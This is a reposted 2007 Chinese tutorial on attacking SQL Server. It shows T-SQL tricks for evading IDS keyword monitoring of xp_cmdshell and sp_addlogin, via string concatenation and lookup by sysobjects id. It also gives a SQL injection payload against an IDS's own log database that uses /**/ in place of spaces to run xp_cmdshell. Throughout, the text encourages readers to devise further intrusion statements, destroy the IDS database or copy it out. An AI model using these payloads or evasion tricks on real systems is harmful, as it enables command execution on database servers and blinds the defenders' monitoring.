SQL Server数据库的一些攻击(4)
发表于:2007-05-25来源:作者:点击数:
标签:
利用t- sql 骗过ids或攻击ids 现在的ids已经变得越来越聪明了 有的ids加入了xp_cmdshell sp_addlogin 的监视 。 但是毕竟人工智能没有出现的今天,这种监视总是有种骗人的感觉 先说说欺骗ids: ids既然监视xp_cmdshell关键字,那么我们可以这么做 declare @a
利用t-
sql骗过ids或攻击ids
现在的ids已经变得越来越聪明了
有的ids加入了xp_cmdshell sp_addlogin 的监视 。
但是毕竟人工智能没有出现的今天,这种监视总是有种骗人的感觉
先说说欺骗ids:
ids既然监视xp_cmdshell关键字,那么我们可以这么做
declare @a sysname set @a="xp_"+"cmdshell" exec
@a 'dir c:\'
这个代码相信大家都能看明白,还有xp_cmdshell作为一个store procedure在master库内有一个id号,固定的,我们也可以这么做
假设这个id=988456
declare @a sysname select @a=name from sysobjects where id=988456
exec @a 'dir c:\'
当然也可以
declare @a sysname select @a=name from sysobjects where id=988455+1
exec @a 'dir c:\'
这种做法排列组合,ids根本不可能做的到完全监视
同理,sp_addlogin也可以这么做
再说说攻击ids:
因为ids数据量很大,日至通常备份到常规
数据库,比如sql server
如果用古老的recordset.addnew做法,会严重影响ids的
性能,因为通过ado做t-sql请求,不但效率高,而且有一部分工作可以交给sql
server 去做
通常程序会这么写ues ('日至内容',…)
那么我么想想看,如果用
temp') exec xp_cmdshell 'dir c:\' --
提交后会变成
insert table values ('日至内容'….'temp') exec xp_cmdshell 'dir c:\' --
')
这样,xp_cmdshell就可以在ids的数据库运行了 :)
当然ids是一个嗅叹器,他会抓所有的报,而浏览器提交的时候会把空格变成%20
因此,%20会被提交到sql server,这样你的命令就无法执行了
唯一的办法就是
insert/**/table/**/values('日至内容'….'temp')/**/exec/**/xp_cmdshell/**/'dir
c:\'/**/-- ')
用/**/代替空格做间隔符,这样你的t-sql才能在ids的数据库内执行
当然也可以用其他语句,可以破坏,备份ids的数据库到你的共享目录
呵呵
其实这种方法的原理和攻击asp是一样的,只是把空格变成了/**/
本来asp是select语句,那么用'就可以屏蔽
现在ids用insert语句,那么用')屏蔽
好了,其他很多新的入侵语句大家可以自己慢慢想,最好的
测试工具就是query analyzer了。
原文转自:http://www.ltesting.net
|